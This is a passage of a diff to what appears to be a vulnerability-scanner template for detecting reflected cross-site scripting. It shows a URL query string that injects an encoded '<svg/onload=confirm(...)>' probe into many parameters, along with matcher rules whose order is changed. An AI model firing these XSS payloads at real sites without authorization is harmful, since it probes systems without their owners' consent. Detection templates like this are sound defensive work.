"location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" host-redirects: true max-redirects: 1 @@ -63,15 +66,15 @@ http: words: - "text/html" - - type: word - part: body - condition: or - negative: true - words: - - "Access Denied" - - "You don't have permission to access" - - type: status status: - 200 + + - type: word + part: body + condition: or + words: + - "Access Denied" + - "You don't have permission to access" + negative: true # digest: 4a0a004730450220422fa88099c081d3188fb7d1e5615710b29e2f5ec74a4daccf72f1faa714fcda02210093290ee6f988d9ad886291b9c801bbdd358e83fdcdd779ecbf65413328fc6d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file